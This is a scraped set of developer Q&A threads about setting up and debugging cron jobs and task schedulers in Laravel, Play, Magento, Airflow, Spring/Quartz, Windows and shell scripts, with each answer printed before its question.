You can achieve this with 2 components: anartisan console commandandtask scheduling.Create a console command which deletes old itemsSchedule the command to run every minuteFirst we'll create the console command:Scaffold a new console command usingphp artisan make:command TruncateOldItemsWithin your new command define$signatureasitems:truncateand include a description in$descriptionFrom within thehandlemethod select all items that meet your conditions, then rundelete()on them, e.g:public function handle() { Item::where('datetime', '<', Carbon::now())->each(function ($item) { $item->delete(); }); }Then we'll schedule the command:OpenApp\Console\Kernel.phpFrom within theschedulemethod, schedule your command:$schedule->command('items:truncate')->everyMinute();Start the schedulerby adding a cron entry:* * * * * php /path-to-your-project/artisan schedule:run >> /dev/null 2>&1Notes: You'll need to swap outItemfor your model, and include both your model and Carbon in the command class withuse App\Itemanduse Carbon\Carbonat the top of the console command class.
I have a database table which fetches some information from an API.The columns areid datetime name 10011 2018-01-26 somethingWhat I am looking for is to delete this entry, since it's date now is in the past.Is there a way to specify a cron job in Laravel, which automatically deletes the column - which has an entry ofdatetimeand which is on past?
Laravel delete records of table for past date automatically
This can be done using the Global Class, and over riding the onstart method.https://www.playframework.com/documentation/2.5.x/JavaGlobalAn abstract view of the coding is given below. Hope this helppublic class Global extends GlobalSettings { private Cancellable scheduler; @Override public void onStart(Application application) { int timeDelayFromAppStartToLogFirstLogInMs = 0; int timeGapBetweenMemoryLogsInMinutes = 10; scheduler = Akka.system().scheduler().schedule(Duration.create(timeDelayFromAppStartToLogFirstLogInMs, TimeUnit.MILLISECONDS), Duration.create(timeGapBetweenMemoryLogsInMinutes, TimeUnit.MINUTES), new Runnable() { @Override public void run() { System.out.println("Cron Job"); // Call a function (to print JVM stats) } }, Akka.system().dispatcher()); super.onStart(application); } @Override public void onStop(Application app) { scheduler.cancel(); super.onStop(app); } }
I'm using Play 2.3.8(activator) & Mongodb as dbI've some products in products collection and each product has expiry date and once its expiryI need to remove documents in products collection.I'm planing to write cron job to remove documents in products collection which will run every day at once in particular time.I'm thinking I can use Annotations like @on, @Every in java(I'm writing code in play java, not play scala). but when I googled i got some plugins or tools or solutionsa)https://github.com/ssachtleben/play-plugins/tree/master/cronb) Quartz Job schedular as dependency to play 2.3(activator)c) Akka async jobs(I don't how to use this, how to intigrate with play and even I'm new to Akka)I'm in confusion state, Could you please suggest me in followingwhich one I can use for my requirement?Am I in correct path to do my job?Is there any thing which will do my job at database level? Thanks in advance.
how to write cron job in play framework 2.3
I think you got one too many*'s there. And yes you can set the PATH variable in cron. A couple of ways. But your problem is the extra*.
I have made a simple cron job by typing the following commandscrontab -ethen in the vi file opened I types* * * * * * echo 'leon trozky' >> /Users/whitetiger/Desktop/foo.txt 2>&1the filefoo.txtindeed gets created, but its content is/bin/sh: Applications: command not foundI'm guessing this has to do with the PATH value ofcron. Is there any way to set the PATH in thecronfile such that when I transfer it to another mac I won't have to set the PATH manually? is this even a PATH problem?
cron problems running very basic commands
Use "whoami" in your script runbackup.sh will shows who is excuting the shell.Every user's cron job will start a shell process. So Every whoami show the running users' name.Pls note that: All Users have permition to files mentioned in runbackup.sh.
As root, I can add user specific cron job bycrontab -u user1 -e. There I can mention a shell script sayrunbackup.shto get executed.Sincerunbackup.shscript is used for many users, the script need to know the username (hereuser1) to do some user specific actions.How the runbackup.sh could get the username when cron job invokes it?Thanks,
Getting username while cron job is invoked
That's not garbage, that is the correct remote address. Someone used IPv6 to access your server.
I have a PHP script sitting on a server that is hit by several different machines at different times throughout the day based on cronjobs that are setup on each machine. I'd like to know the IP of the machines making the request and when it is made by a browser, the following executes successfully:<?php ... echo $_SERVER['REMOTE_ADDR']; ... ?>However, when made by CURL or any other command line tool I have attempted to use (lynx included), I end up with the following garbage:2701:5:4a80:7d:2ee:8eff:5e61:801dFrom the investigation I've done, this is a result of Apache not populating the$_SERVERvariable for requests received that are made from the command line.REMOTE ADDR Issue with Cron JobAnyone know of a way to get command line requests to play nice with the$_SERVERvariable or should I go down another route?
"Garbage" IP address with colons in $_SERVER['REMOTE_ADDR'] for some clients
On Magento and Cron setups, use cron.sh to do the triggering. Also I believe inTrust but verifywhich means set up cron and then actually view the cron job output table for proper runs.Go into your Advanced System Config and set Cron Success History Lifetime and Failure Lifetime both to 1440 so you are monitoring a 24 hour span of time.You will now be able to see index operations, etc in the time stream. There will be about 300 jobs listed in your Jobs Successful section over the 24 hour timespan.Now run thiscron log monitorto see if your cron really is running. I've run into many times when the person says it is, but then tries to verify it and finds that it pooped out after a couple tries.The next issue is the statementBut if I check the file /app/code/core/Mage/Sitemap/etc/config.xml it seems to be not updated. First, this is a configuration template, it will not update. The enable is done in the database. You check it in System -> Config -> Catalog -> Google Sitemap -> Generation Settings -> Enable = Yes should be the setting and once saved, stays on Yes. Magento consults this setting stored in the database, not the config.xml to actually run the sitemap generation.Now if you've got the sitemap properly created under Catalog -> Google Sitemap, the date/time stamp on your actual sitemap.xml file should start updating.
I'm a newbie in Magento. I'm tring to configure an auto-generated Google Site Map. I've read everywhere how to set up cron job for Magento with cPanel, how to configure from backend and so on.My current settings: under System -> Configuration -> Google Sitemap -> Generation Settings -> Enabled = YES. I've create the sitemap on Catalog -> Google Sitemap, of course, which I can manually generate without any problem.But if I check the file/app/code/core/Mage/Sitemap/etc/config.xmlit seems to be not updated (different content btw config.xml and backend). It seems also that the last update on filesystem is perormed on 20/04/2012, instead of today. (I've also run the Fluch Magento and Storage Cache)<generate> <enabled>0</enabled> <error_email/> <error_email_template>sitemap_generate_error_email_template</error_email_template> <error_email_identity>general</error_email_identity> </generate>Can someone help me out? Thanks!
Magento and Google Sitemap - Cron
You basically have two options:Change the system wide timezone.Make your DAG timezone aware.1. Change the system wide timezoneIn yourairflow.cfgyou can define what the scheduling timezone is. For example for Amsterdam it would be:[core] default_timezone = Europe/AmsterdamThis will set the complete airflow installation to schedule based on Amsterdam times.2. Make your DAG timezone awareIf you supply astart_datethat is timezone-aware, it will use that timezone to keep track of daylight saving time asmentioned here. The following example is directly copied fromthe airflow documentationand illustrates how to make your DAG timeozne aware.import pendulum local_tz = pendulum.timezone("Europe/Amsterdam") default_args=dict( start_date=datetime(2016, 1, 1, tzinfo=local_tz), owner='airflow' ) dag = DAG('my_tz_dag', default_args=default_args) op = DummyOperator(task_id='dummy', dag=dag) print(dag.timezone) # <Timezone [Europe/Amsterdam]>
I have an airflow scheduler which has UTC as its time zone. I would like to schedule a DAG based on EST timings. The issue here is I want to schedule my DAG to run from 6 PM to 9 PM EST every Mon-Fri. Converting EST to UTC 6 PM becomes 10 PM and 9 PM becomes 1 AM of the next day.I tried giving crontab expression based on UTC -'0 10-23,1 * * MON-FRI'but due to varying time zones my DAG will skip run of 0 AM to 1 AM (8-9 PM EST) on Fridays. Kindly help me with achieving the proper scheduling for this.Any help is appreciated.
Scheduling a DAG in EST time zone - Airflow
Cron will send the STDOUT and STDERR from the script by email.>> /var/log/test.log 2>&1… but your script has redirected them both to a file so there isn't any data to send.Remove the redirect if you want the data to appear in an email instead.
I have installedPostFixandsendmailboth, and then try to set cron for a python script and want to send an email by cron.My cron schedule like:[emailΒ protected]*/2 * * * * python3 /var/test.py >> /var/log/test.log 2>&1Still Cron is not sending any email.Please help what i need to do more.
Cron not sending email
Usually, when you want more granularity than 1 minute, you have to write a daemon.I advise you to try, now it's not so hard as it was some years ago. Just start with a simple loop inside a CLI command:while (true) { doPeriodicStuff(); sleep(1); }One important thing: run the daemon viasupervisord. You can take a look at articles about Laravel's queue listener setup, it uses the same approach (a daemon + supervisord). A config section can look like this:[program:your_daemon] command=php artisan your:command --env=your_environment directory=/path/to/laravel stdout_logfile=/path/to/laravel/app/storage/logs/your_command.log redirect_stderr=true autostart=true autorestart=true
I have a project that needs to send notifications via WebSockets continuously. It should connect to a device that returns the overall status in string format. The system processes it and then sends notifications based on various conditions.Since the scheduler can repeat a task as early as a minute, I need to find a way to execute the function every second.Here is myapp/Console/Kernel.php:<?php ... class Kernel extends ConsoleKernel { ... protected function schedule(Schedule $schedule) { $schedule->call(function(){ // connect to the device and process its response })->everyMinute(); } }PS: If you have a better idea to handle the situation, please share your thoughts.
Laravel schedular: execute a command every second
If you want time stamped logs, you add the string of a formatted date command, date +%d%y%m for day month year in number format.You can use backtick to put the string in the cron:~$ /home/me/cron_log-`/bin/date +%d-%m-%y`So the file name will have the current date appended to it. The backtick says "run this command and put the output here as a string".Now the problem is that your directory might get huge and then you have to write a short script to delete them by time. I have a script that reads the format and keeps X and deletes the rest but most people would just use "find" to delete by time older stuff, like logs that have mtime > 1 year.
I have figured out how to output cron jobs to a log file using>>and providing a path to the log file. The>>appends log information to the existing file. How can I make it so the cron job creates a new log file every time it runs? (i.e.rsync.log,rsync(1).log,rsync(2).log-- ideally though I'd like the file name of the log to be something likeDD-MM-YY.log).I want a separate log file so this one log file doesn't get so huge and if/when we go to look if a file/folder was successfully backed up (I'm running an rsync command in the cron job) we don't have to comb through a MASSIVE log file.Additionally, when the cron job is outputted to the log file, there are no time/date references. Example of my first log output:**sending incremental file list** **sent 78 bytes received 11 bytes 35.60 bytes/sec** **total size is 0 speedup is 0.00**That's it. The timestamp on this logfile will keep changing every time the job is run, so we wouldn't even be able to tell what day that particular file/folder was copied via rsync. If I had a separate log file for every time the cron job ran, I could just open the log file for the particular date that it was created and view what was backed up.My current cronjob:*/1 * * * * rsync -avz /home/me/test/[emailΒ protected]:test/ >>/home/me/cron_logs/homedir_backups/rsync.log 2>&1I only have it set to 1 minute for testing purposes. Eventually this will only run daily at midnight.
New log file every time cron job runs
- Create a batch file such as starter.bat and type NET START "SERVICE NAME"2- Create a Task in Task Scheduler for 7:00 a.m that run batch file every day and remember to checkRun task as soon as possible after a scheduled start is missedin Settings tab so it will start even if system boot up after 7 a.m.Repeat those steps for stoper.bat include NET STOP "SERVICE NAME" for 23:00 p.m
I've a .NET windows service that should start at 7:00 and stop at 23:00 each day, running continuously in background.While I can code the service so that it sleep between 23 and 7, I would prefer a system configuration (something likecronin unix).How can I do this on Windows 7?Note that, if system boot up after 7:00, the service should start immediatly.
How to schedule the start and stop of a Windows service?
I just had to do this. If you just want to check if the box you are on is floating the public ip and the ip is, say, a.b.c.d, then it is enough to run:ip a | grep a.b.c.dI'm pretty sure in bash you can use the output of that command as a conditional itself. If the machine is not floating the public ip, the output should be empty, hence evaluate to false and if there is a match for the ip, then it should evaluate to true.
I have 2 app servers both configured to run a php cron job, but only 1 can run the job at any time. Since I am already using keepalived for other purposes, I am thinking of having some logic in the cron job to check if the node has the virtual ip, then execute the job. So theoretically even though both servers are running the cron job at the same time, only 1 will be executing the 'real' job.But my question is how to check if the node has the vip? Can someone advise me on that?Thanks.
keepalived check which is master node
Yes this is correct, you can verify it bythis, and it takes 0-23 for Hhour field so it will invoke at 3 am
I am using Java - Spring - Quartz Scheduler. I want to run job by 3 AM in the morning and following is my cron expression.0 0 3 * * ?Can somebody tell me is it the correct one? Will it execute twice in 24 hour 3 PM and 3 AM?
Spring cron expression for 3 AM
The probable answer is that the cron job executes under your user - and the directory is owned by apache (or www-data or nobody or whatever user your web server runs as).To get it to work, you could set up the cron job to run as the web server user. Something like this:su -l www-data -c 'crontab -e'Alternatively, you could change the permissions to 775 (read-write-execute for the owner and group, and read-execute for others) and set the group ownership of the folder to the user running the cron job.However, you have to make sure that if you're deleting something or descending into folder which is created by apache, you could still run into problems (apache would create a file which it itself owns, and your user cannot delete it then, regardless of the directory permissions.You could also look at some stuff like suphp or whatever is up to date - where the web server processes are ran under your username, depending on your system architecture.
I have a folder above the webroot that is used to temporarily store user files generated by a php web application. The files may, for example, be PDF's that are going to be attached to emails.The folder permissions are set to rwxr-xr-x (0755). When executing a procedure from the web application, the files get written to this folder without any issues.I have now also set up a cron job that calls the php script to execute that exact same procedure as above. However, the PDF cannot be saved into the above folder due to failed permissions - the cron job reports back apermission deniederror.I have tried setting the folder permissions to 0775 and still get a permission denied. However, when the permissions are 0777, then the cron job then works fine.This seems very strange to me - why does the cron get a permission denied at 0755 but it works fine through the web app?
Cron job and folders permissions - permission denied
As explained in this duplicate thread:PHP & cron: security issuesYou should keep this file outside of public_html.Sometimes, though, this is not possible. My mind went toMoodle, where a similar feature exists. This is what they do.Fromcron.php:... /// The current directory in PHP version 4.3.0 and above isn't necessarily the /// directory of the script when run from the command line. The require_once() /// would fail, so we'll have to chdir() if (!isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['argv'][0])) { chdir(dirname($_SERVER['argv'][0])); } ... /// check if execution allowed if (isset($_SERVER['REMOTE_ADDR'])) { // if the script is accessed via the web. if (!empty($CFG->cronclionly)) { // This script can only be run via the cli. print_error('cronerrorclionly', 'admin'); exit; } // This script is being called via the web, so check the password if there is one. if (!empty($CFG->cronremotepassword)) { $pass = optional_param('password', '', PARAM_RAW); if($pass != $CFG->cronremotepassword) { // wrong password. print_error('cronerrorpassword', 'admin'); exit; } } } ...
I know how to run a script with a cron, but what I need is to be able to run my script only by a cron.Thank you!
run php script only by cron
You just have to create the cron file, then use exec to set up that cron:$cron_file = 'cron_filename'; // Create the file touch($cron_file); // Make it writable chmod($cron_file, 0777); // Save the cron file_put_contents($cron_file, '* * * * * your_command'); // Install the cron exec('crontab cron_file');This requires that the user which PHP is run under has the right to make crontabs. This cron file will by default replace any other crons for that user, so make sure to ask the user if he wants to apply the cron. Also make sure the folder you're writing the crontab file in is writable.
I'm developing a web application that requires the use of Cron. I'd like to make it easy to setup with an auto install process like Wordpress. I have no problems writing the install script up en till its time to set up Cron. Please tell me if I can do this.
Install a cron job with a php script
I believe you are using the wrong kind of quotes. Plain-quoting ssh-agent doesn't do anything, you need to incorporate the results of running it by usingcommand substitutionwith:eval `ssh-agent`oreval $(ssh-agent)This causes the script to set the needed environment variables. However,ssh-agentstill will not have any keys unless youssh-addthem. If your keys have no passphrase, thenssh-addcan simply be run from the script.If your private key does have a passphrase, you might want to run this script as a daemon rather than a cron job. This would allow you to connect to the agent and add your private keys.The real reason the script works from the command line is that your desktop environment is probably runningssh-agentand it arranges for the needed environment variables to be propagated to all your terminal windows. (Either by making them be children and inheriting the variables or by having your shell source the necessary commands.) I'm guessing you are runningssh-addat some point in your normal workflow?
I've put this script together to updated a folder of forked Github repositories on a daily basis. It runs fine if I call it from a prompt, but I can' figure out how to make it utilize my id_rsa reliably when it is run as a cron job. theeval 'ssh-agent'is an attempt to do just that, but it doesn't seen to have any positive affect.#!/bin/sh LOGPATH=log.txt eval 'ssh-agent' cd /path/to/update/folder echo "-------START UPDATE-------">$LOGPATH echo "Updating repos:">>$LOGPATH date "+%F %T">>$LOGPATH COUNT=1 find . -maxdepth 1 -type d | while read dir; do cd "$dir" LEN=$"${#dir}" if [ $LEN != "1" ] then echo "*********">>$LOGPATH echo "$COUNT. " ${dir:2}>>$LOGPATH /usr/local/bin/git pull upstream master>>$LOGPATH 2>> $LOGPATH /usr/local/bin/git push origin master>>$LOGPATH 2>> $LOGPATH let COUNT=COUNT+1 fi cd "$OLDPWD" done echo "-------END UPDATE-------">>$LOGPATH exit 0This is probably a horribly inefficient way to go about the process in general, but it works and I don't ever see it. If I could get it to use my creds, I would be elated.
Accessing SSH key from bash script running via a cron job
Unless the linux version is very different, under settings > advanced > updates, there are settings you can disable, that are concerned with the automatic searching for updates for firefoxx and its add ons.In "about:config" you can set "Browser.sessionstore.enabled" to false, in which case firefox will not restore your tab state after a crashed browsing session.
Closed.This question isoff-topic. It is not currently accepting answers.Want to improve this question?Update the questionso it'son-topicfor Stack Overflow.Closed11 years ago.Improve this questionI start Firefox (Linux) via command line using a cron-job. When there is no update for the add-ons, it starts up normally, then I can tell it what to do. However if there is an update for an add-on, then it ask whether to take that update or not. I don't have the ability to detect the pop up window and choose no.So, how can I disable all questions upon startup of Firefox?Questions like:Do you want to update add-ons?Do you want to upgrade Firefox?Do you want to open previous tabs or new session?I pretty much would like to keep my version of Firefox the way it is and not have any questions asked.When I start Firefox, I would like to have it start nice and clean without any questions.
How to disable Firefox add-ons update check on start [closed]
Change the first * to 0, with a star you are saying "every second".Replacing it with a 0 (or any other number 0-59) will have it run on that "second" instead of "all of them".
My job is running every at the time specified but its running every second of time specified, for example if I set a job to run at 22:54 it will run every second from 22:54:00 until 22:54:59. I want it to just run once at the time specified...any help is much appreciatedmy code:@Scheduled(cron = "* 54 22 * * ?") public void getCompaniess() { System.out.println(new Date()+" > Running testScheduledMethod..."); }output:Thu Mar 12 22:54:00 GMT 2020 > Running testScheduledMethod... Thu Mar 12 22:54:01 GMT 2020 > Running testScheduledMethod... ..... Thu Mar 12 22:54:59 GMT 2020 > Running testScheduledMethod...
Spring scheduled cron job running too many times
UpdateusingDjango 2.0.6+ AWS ElasticBeanstalk + CronjobI found I needed to export the AWS environment variables using source /opt/python/current/env to prevent manage.py from throwing the error "The SECRET_KEY setting must not be empty".This is because I had placed my Django Secret key in the os.environ for beanstalk which it seems is not accessible by shell/cron by default.Seehttps://forums.aws.amazon.com/thread.jspa?threadID=108465My final cron job .txt script was as follows. (process_emails is my owndjango management function, myjob.log is where the output of the function call is logged).*/15 * * * * source /opt/python/run/venv/bin/activate && cd /opt/python/current/app/ && source /opt/python/current/env && python manage.py process_emails >> /var/log/myjob.log 2>&1
I'm having trouble getting my cron jobs to execute.Setup:Django - 1.9Elastic beanstalk - 64bit Amazon Linux 2016.03 v2.1.3 running Python 3.4I've tried doing this a couple of ways so far:Using a cron.yaml file: Didn't touch anything else - just added a cron.yaml file to my project root folderversion: 1 cron:- name: "test" url: "http://website.com/workers/test" schedule: "*/10 * * * *"Using a container command and a separate cron.txt file:Added this line in my .ebextensions/development.config file05_some_cron: command: "cat .ebextensions/crontab.txt > /etc/cron.d/crontab && chmod 644 /etc/cron.d/crontab" leader_only: trueand in .ebextensions/crontab.txt*/10 * * * * source /opt/python/run/venv/bin/activate && python mysite/manage.py testThe app deploys successfully in both cases.Manually (in a browser) going tohttp://website.com/workers/testhas the intended outcome (in the first case).Addingsource /opt/python/run/venv/bin/activate && python mysite/manage.py testas a management command runs the correct script once on deploying.The logs do not show any GETS on that url.What am I doing wrong? Am I missing some step of the process or some setup step on EBS?Also what is the best ways to run cron jobs for django applications hosted on EBS? - django apps can run management commands either from the command line as in attempt 2 or by extending a GET or POST url as in attempt 1.
Running cron jobs on aws elastic beanstalk - django
One option is to test whether the script is attached to a tty.#!/bin/sh if [ -t 0 ]; then echo "I'm on a TTY, this is interactive." else logger "My output may get emailed, or may not. Let's log things instead." fiNote that jobs fired byat(1)are also run without a tty, though not specifically by cron.Note also that this is POSIX, not Linux- (or bash-) specific.
Is it possible to identify, if a Linux shell script is executed by a user or a cronjob?If yes, how can i identify/check, if the shell script is executed by a cronjob?I want to implement a feature in my script, that returns some other messages as if it is executed by a user. Like this for example:if [[ "$type" == "cron" ]]; then echo "This was executed by a cronjob. It's an automated task."; else USERNAME="$(whoami)" echo "This was executed by a user. Hi ${USERNAME}, how are you?"; fi
How-to check if Linux shell script is executed by a cronjob?
Something to consider is that a standard valid cron expression will always refer to a valid time in the future. The one caveat to this is that Quartz cron expressions may include an optional year field, which could be in the past as well as the future.To check the validity of the expression, you can build aCronExpressioninstance then ask it for the next valid future time; anullindicates that there is no valid future time for the expression. Here's a quick unit test example:@Test public void expressionTest() { Date date; CronExpression exp; // Run every 10 minutes and 30 seconds in the year 2002 String a = "30 */10 * * * ? 2002"; // Run every 10 minutes and 30 seconds of any year String b = "30 */10 * * * ? *"; try { exp = new CronExpression(a); date = exp.getNextValidTimeAfter(new Date()); System.out.println(date); // null exp = new CronExpression(b); date = exp.getNextValidTimeAfter(new Date()); System.out.println(date); // Tue Nov 04 19:20:30 PST 2014 } catch (ParseException e) { e.printStackTrace(); } }Here's alinkto the QuartzCronExpressionAPI.
I am designing a scheduler and using quartz library. I want to check whether cron expression time refer to the time in the future, Otherwise trigger won't be executed at all. Is there any way of comparing cron expression time with current time in java.
compare Cron Expression with current time
if it isn't a user issue (where you run the job as root, missing the right $HOME/.ssh folder), it can be apassphrase issue:turns out I was mistaken, and the ssh key was password protected (with keychain loading the ssh-agent), hence why it failed from a script but not when running from the bash session.Adding. ~/.keychain/$HOSTNAME-shto my script resolved the problem.The passphrase bit is detailed in "Not able to ssh in to remote machine using shell script in Crontab":You can make ssh connections within a cron session. What you need is to setup a public key authentication to have passwordless access.For this to work, you need to havePubkeyAuthentication yesin each remote server'ssshd_config.
I have created an SSH key (followingthe official tutorial), added it to GitHub and created a Bash script that commits and pushes a single file to my repository on Github. When I run this script from the command line, everything works fine and the updates are pushed. However, when I set up a job usingcrontab -e, the push generates the following error:Permission denied (publickey). fatal: The remote end hung up unexpectedlyI have edited the user's crontab (crontab -e), i.e. I'm NOT usingsudo crontab -e. I'm running Ubuntu 12.04.
Pushing to GitHub using a cron job -- Permission denied (publickey)
I do not see what is the purpose of that and there is probably a better way to do but I think it should be done like thatI never had this case but you probably can use the class Mage_Cron_Model_ScheduleMage::getModel('cron/schedule')and set data accordingly, then save. You need to define what is the cron task anyway in a config.xml for magento to be able to associate.It should populate the table cron_schedule that it is checked for the cron tasks to be ran.
I want to create cron job task programmatically without using config.xml file. Is it possible?
Create Magento cron job task programmatically
Try to make bin/rails executable:chmod u+x bin/railsThis is, of course, assuming that bin/rails is owned by the crontab's user.
'I have set up a cron with wehenever, but its not working. I tried to run the command manually and i get the error/bin/bash: bin/rails: Permission denied.Here what the command of the cron looks like:/bin/bash -l -c 'cd /var/www/domain.net/main && bin/rails runner -e production '\''User.weekly_update'\'''I also tried to run this command asrootbut i got the same message.
Whenever - Cron not working? Permission denied